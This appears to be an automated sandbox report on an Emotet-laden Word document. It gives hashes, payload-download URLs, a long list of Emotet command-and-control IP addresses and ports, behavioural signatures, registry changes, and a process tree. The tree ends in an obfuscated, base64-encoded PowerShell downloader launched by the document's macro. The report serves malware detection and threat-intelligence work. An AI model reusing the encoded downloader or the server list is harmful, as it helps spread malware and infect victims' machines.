Analysis
-
max time kernel
134s -
max time network
146s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
17-11-2020 17:35
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e1_1f0e02ade3ec7f795972dab63c97fc6cef31a06797e37bde682eb0528968f78a_2020-11-17__172930709611._doc.doc
Resource
win7v20201028
General
-
Target
emotet_e1_1f0e02ade3ec7f795972dab63c97fc6cef31a06797e37bde682eb0528968f78a_2020-11-17__172930709611._doc.doc
-
Size
287KB
-
MD5
34bffae510670ff5c41ede77172eea2a
-
SHA1
e50bc5fa2c7d5ecea2064ad1cd0f92bd6cfc6764
-
SHA256
1f0e02ade3ec7f795972dab63c97fc6cef31a06797e37bde682eb0528968f78a
-
SHA512
ed3907652a16425ffe9ac4660d1ef69825689943022e8acaafc47b10fb87bd1b1adec0ee531454e6fbd96dee66dbde50d2d77dec0d3fdc01ddbcced6c1c0d775
Malware Config
Extracted
http://innhanmachn.com/wp-admin/sA/
http://shomalhouse.com/wp-includes/ID3/IDz/
http://blog.martyrolnick.com/wp-admin/Spq/
https://www.frajamomadrid.com/wp-content/g/
https://pesquisacred.com/vmware-unlocker/daC/
https://medhempfarm.com/wp-admin/Lb/
http://ienglishabc.com/cow/2BB/
Extracted
emotet
Epoch1
190.202.229.74:80
118.69.11.81:7080
70.39.251.94:8080
87.230.25.43:8080
94.23.62.116:8080
37.187.161.206:8080
45.46.37.97:80
138.97.60.141:7080
177.144.130.105:8080
169.1.39.242:80
209.236.123.42:8080
202.134.4.210:7080
193.251.77.110:80
2.45.176.233:80
217.13.106.14:8080
189.223.16.99:80
190.101.156.139:80
77.238.212.227:80
181.58.181.9:80
37.183.81.217:80
74.58.215.226:80
174.118.202.24:443
168.197.45.36:80
81.215.230.173:443
192.175.111.212:7080
216.47.196.104:80
128.92.203.42:80
94.176.234.118:443
191.182.6.118:80
212.71.237.140:8080
24.232.228.233:80
177.73.0.98:443
177.23.7.151:80
24.135.69.146:80
83.169.21.32:7080
189.34.181.88:80
179.222.115.170:80
177.144.130.105:443
213.197.182.158:8080
5.89.33.136:80
77.78.196.173:443
120.72.18.91:80
50.28.51.143:8080
190.64.88.186:443
111.67.12.221:8080
12.162.84.2:8080
46.105.114.137:8080
59.148.253.194:8080
201.213.177.139:80
82.76.52.155:80
172.104.169.32:8080
188.251.213.180:80
46.43.2.95:8080
137.74.106.111:7080
188.135.15.49:80
185.94.252.27:443
197.232.36.108:80
60.249.78.226:8080
187.162.248.237:80
181.129.96.162:8080
46.101.58.37:8080
109.242.153.9:80
178.211.45.66:8080
200.59.6.174:80
83.103.179.156:80
172.86.186.21:8080
70.32.115.157:8080
81.214.253.80:443
201.49.239.200:443
149.202.72.142:7080
190.45.24.210:80
186.189.249.2:80
219.92.13.25:80
170.81.48.2:80
51.75.33.127:80
192.241.143.52:8080
45.33.77.42:8080
152.169.22.67:80
185.183.16.47:80
186.70.127.199:8090
1.226.84.243:8080
78.206.229.130:80
37.179.145.105:80
68.183.170.114:8080
192.232.229.54:7080
103.236.179.162:80
70.32.84.74:8080
79.118.74.90:80
60.93.23.51:80
181.120.29.49:80
213.52.74.198:80
51.255.165.160:8080
183.176.82.231:80
186.193.229.123:80
98.103.204.12:443
129.232.220.11:8080
181.61.182.143:80
68.183.190.199:8080
190.115.18.139:8080
200.24.255.23:80
103.13.224.53:80
85.214.26.7:8080
190.24.243.186:80
87.106.46.107:8080
177.107.79.214:8080
12.163.208.58:80
187.162.250.23:443
109.101.137.162:8080
82.76.111.249:443
181.30.61.163:443
5.196.35.138:7080
51.15.7.145:80
192.198.91.138:443
188.157.101.114:80
189.2.177.210:443
181.123.6.86:80
109.190.35.249:80
45.16.226.117:443
190.190.219.184:80
104.131.41.185:8080
101.187.81.254:80
62.84.75.50:80
178.250.54.208:8080
201.71.228.86:80
190.92.122.226:80
138.97.60.140:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 608 1804 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1740-13-0x0000000002280000-0x00000000022DB000-memory.dmp emotet behavioral1/memory/1740-14-0x00000000022E0000-0x000000000233A000-memory.dmp emotet behavioral1/memory/800-21-0x0000000001F10000-0x0000000001F6A000-memory.dmp emotet behavioral1/memory/800-20-0x0000000001EB0000-0x0000000001F0B000-memory.dmp emotet -
Blacklisted process makes network request 2 IoCs
Processes:
POwersheLL.exeflow pid process 6 608 POwersheLL.exe 8 608 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
N1pjur3u.exefundisc.exepid process 1740 N1pjur3u.exe 800 fundisc.exe -
Loads dropped DLL 2 IoCs
Processes:
N1pjur3u.exepid process 1740 N1pjur3u.exe 1740 N1pjur3u.exe -
Drops file in System32 directory 2 IoCs
Processes:
N1pjur3u.exePOwersheLL.exedescription ioc process File opened for modification C:\Windows\SysWOW64\hcproviders\fundisc.exe N1pjur3u.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POwersheLL.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{A1A5A1EB-1893-4A1F-956C-45D30B8D9E75}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\TypeLib\{A1A5A1EB-1893-4A1F-956C-45D30B8D9E75}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A1A5A1EB-1893-4A1F-956C-45D30B8D9E75}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 848 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
POwersheLL.exefundisc.exepid process 608 POwersheLL.exe 608 POwersheLL.exe 800 fundisc.exe 800 fundisc.exe 800 fundisc.exe 800 fundisc.exe 800 fundisc.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 608 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 848 WINWORD.EXE 848 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEN1pjur3u.exedescription pid process target process PID 848 wrote to memory of 1956 848 WINWORD.EXE splwow64.exe PID 848 wrote to memory of 1956 848 WINWORD.EXE splwow64.exe PID 848 wrote to memory of 1956 848 WINWORD.EXE splwow64.exe PID 848 wrote to memory of 1956 848 WINWORD.EXE splwow64.exe PID 1740 wrote to memory of 800 1740 N1pjur3u.exe fundisc.exe PID 1740 wrote to memory of 800 1740 N1pjur3u.exe fundisc.exe PID 1740 wrote to memory of 800 1740 N1pjur3u.exe fundisc.exe PID 1740 wrote to memory of 800 1740 N1pjur3u.exe fundisc.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_1f0e02ade3ec7f795972dab63c97fc6cef31a06797e37bde682eb0528968f78a_2020-11-17__172930709611._doc.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD JAAxAEQAMgAgACAAPQBbAHQAWQBwAEUAXQAoACIAewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAGUAYwBUAG8AJwAsACcAUwB0AGUATQAuACcALAAnAFIAeQAnACwAJwBzAHkAJwAsACcASQBvAC4AJwAsACcAZABpAFIAJwApADsAIAAgACAAIAAkAHQASgA4AG0ANABCACAAPQBbAFQAWQBwAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAzAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQBOAFQAbQBBAG4AQQBnACcALAAnAHMAWQBzAHQAZQBNAC4AbgBFACcALAAnAGUAJwAsACcAVAAnACwAJwAuAFMAZQByAFYASQBjAEUAcABPACcAKQAgADsAIAAgACQAWQBzAGEAMgAxADIAZwA9ACgAJwBOACcAKwAoACcAYgA3AGkAYgAwACcAKwAnADAAJwApACkAOwAkAFMAOQA1AGMAegAzADQAPQAkAEkAMABwAGgAcwBkAGsAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEkAeABkAGIAeAB0AG8AOwAkAFEAZABmAGcAMgBjAHAAPQAoACgAJwBDAGgAbgBzACcAKwAnADcAJwApACsAJwAyACcAKwAnAGQAJwApADsAIAAgACgAZABJAFIAIAB2AGEAcgBpAEEAQgBsAGUAOgAxAEQAMgApAC4AdgBhAGwAdQBFADoAOgAiAEMAUgBgAGUAQQB0AGUARABpAHIAYABlAGMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAOABVACcAKwAnAEwAJwApACsAKAAnAFAAagAnACsAJwBxACcAKQArACgAJwA2AHQAMwAnACsAJwBfADgAVQBMACcAKwAnAEoAdgBuACcAKwAnAGsAJwApACsAKAAnADcAJwArACcAeQBrACcAKQArACgAJwA4AFUAJwArACcATAAnACkAKQAuACIAUgBgAGUAYABwAGwAYQBjAGUAIgAoACgAJwA4ACcAKwAnAFUATAAnACkALAAnAFwAJwApACkAKQA7ACQAUQBvADAAOABqAGMAaQA9ACgAJwBGACcAKwAnADUAJwArACgAJwBvAGMAeAAnACsAJwBlAHgAJwApACkAOwAgACgAIAAgAEkAVABFAE0AIAAgAHYAQQBSAEkAQQBiAGwARQA6AFQAagA4AE0ANABCACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBTAGUAQwBgAFUAYABSAEkAYABUAHkAUABSAG8AVABPAGMAYABPAEwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAFIANwB3ADAANQAzAGkAPQAoACgAJwBOAHUAZQAnACsAJwBsADIAJwApACsAJwA0ACcAKwAnAGsAJwApADsAJABUAGUAZABiAHIAMAAwACAAPQAgACgAJwBOACcAKwAnADEAcAAnACsAKAAnAGoAdQByACcAKwAnADMAdQAnACkAKQA7ACQASABfADgAeQBuAGkAMAA9ACgAJwBKADYAJwArACcAYQAnACsAKAAnAGYAJwArACcAZgB2ADYAJwApACkAOwAkAFIAbwB6ADAAOQBkAHAAPQAoACcAVgAnACsAKAAnAHQAOQAnACsAJwAxAG8AcABoACcAKQApADsAJABHAGwAawB2AGYANwBiAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0AUABqAHEANgAnACsAJwB0ACcAKwAnADMAXwAnACsAJwB7ADAAJwArACcAfQBKAHYAbgBrADcAeQBrAHsAMAB9ACcAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQArACQAVABlAGQAYgByADAAMAArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAQQBkAHMANABtAHgAZwA9ACgAKAAnAEUAJwArACcAMgBuACcAKQArACcAMABqACcAKwAnAHEAbwAnACkAOwAkAFEANABiADEAZwA1AG4APQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQB0AC4AVwBFAEIAYwBMAGkAZQBOAHQAOwAkAEIAbwBpAGUAcAAwADEAPQAoACgAKAAnAGgAdAAnACsAJwB0AHAAOgBdAFsAJwArACcAIAAnACkAKwAnADEAJwArACgAKAAnACkAIAAnACkAKQArACcAagBqACcAKwAoACgAJwBrAGcAUwAgAFsAXQAgAFsAXQB3ACcAKwAnAF0AWwAnACsAJwAgADEAKQAnACsAJwAgACcAKQApACsAKAAnAGoAagAnACsAJwBrAGcAUwAgAFsAXQAnACkAKwAoACcAIABbAF0AdwBpACcAKwAnAG4AbgBoACcAKQArACgAJwBhAG4AbQBhACcAKwAnAGMAaABuAC4AJwApACsAKAAoACcAYwBvAG0AXQAnACsAJwBbACAAMQApACAAJwApACkAKwAnAGoAJwArACgAJwBqAGsAZwBTACcAKwAnACAAWwBdACcAKQArACgAJwAgAFsAXQAnACsAJwB3ACcAKQArACcAdwBwACcAKwAoACcALQAnACsAJwBhAGQAbQAnACkAKwAoACgAJwBpAG4AXQBbACAAJwArACcAMQApACcAKwAnACAAagAnACkAKQArACgAJwBqACcAKwAnAGsAZwAnACkAKwAoACcAUwAgAFsAXQAnACsAJwAgAFsAXQAnACkAKwAnAHcAJwArACgAJwBzAEEAJwArACcAXQAnACkAKwAnAFsAJwArACgAKAAnACAAMQAnACsAJwApACAAagBqAGsAZwAnACsAJwBTACcAKQApACsAJwAgACcAKwAnAFsAJwArACgAJwBdACAAJwArACcAWwAnACkAKwAnAF0AdwAnACsAJwBAAGgAJwArACgAKAAnAHQAdABwADoAJwArACcAXQAnACsAJwBbACAAJwArACcAMQApACAAagBqACcAKQApACsAKAAnAGsAJwArACcAZwBTACAAJwApACsAKAAnAFsAXQAnACsAJwAgACcAKQArACcAWwAnACsAJwBdACcAKwAoACgAJwB3AF0AWwAnACsAJwAgADEAKQAnACkAKQArACgAJwAgAGoAJwArACcAagAnACkAKwAoACcAawBnAFMAIABbAF0AJwArACcAIABbAF0AJwArACcAdwBzAGgAJwApACsAJwBvAG0AJwArACcAYQBsACcAKwAoACcAaABvAHUAcwBlACcAKwAnAC4AYwBvACcAKQArACgAJwBtAF0AJwArACcAWwAnACkAKwAnACAAMQAnACsAKAAoACcAKQAnACsAJwAgAGoAagBrAGcAJwApACkAKwAoACcAUwAgACcAKwAnAFsAXQAnACkAKwAoACcAIABbAF0AdwB3AHAALQAnACsAJwBpAG4AJwArACcAYwAnACsAJwBsAHUAJwApACsAJwBkAGUAJwArACgAJwBzACcAKwAnAF0AWwAnACkAKwAnACAAMQAnACsAKAAoACcAKQAgACcAKQApACsAKAAnAGoAJwArACcAagBrACcAKQArACcAZwAnACsAJwBTACAAJwArACgAJwBbAF0AJwArACcAIABbACcAKQArACgAJwBdAHcAJwArACcASQAnACkAKwAoACcARAAzACcAKwAnAF0AWwAnACkAKwAnACAAMQAnACsAJwApACcAKwAoACcAIABqAGoAawAnACsAJwBnACcAKQArACgAJwBTACAAJwArACcAWwBdACcAKQArACcAIAAnACsAKAAoACcAWwAnACsAJwBdAHcASQAnACsAJwBEAHoAXQBbACAAMQApACcAKQApACsAKAAnACAAagBqAGsAZwAnACsAJwBTACcAKQArACcAIAAnACsAKAAnAFsAXQAgACcAKwAnAFsAJwArACcAXQB3AEAAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgBdACcAKwAnAFsAIAAnACkAKwAoACgAJwAxACkAJwApACkAKwAoACcAIAAnACsAJwBqAGoAawBnAFMAIAAnACsAJwBbAF0AIAAnACkAKwAoACcAWwBdACcAKwAnAHcAXQBbACcAKQArACgAKAAnACAAJwArACcAMQApACcAKQApACsAKAAnACAAJwArACcAagBqAGsAJwApACsAKAAnAGcAJwArACcAUwAgAFsAXQAnACkAKwAoACcAIABbACcAKwAnAF0AJwApACsAJwB3AGIAJwArACcAbABvACcAKwAoACcAZwAnACsAJwAuAG0AYQAnACkAKwAoACcAcgAnACsAJwB0AHkAcgAnACkAKwAoACcAbwBsACcAKwAnAG4AaQAnACkAKwAoACcAYwBrAC4AJwArACcAYwBvAG0AJwApACsAJwBdACcAKwAoACcAWwAnACsAJwAgADEAJwApACsAKAAoACcAKQAnACsAJwAgA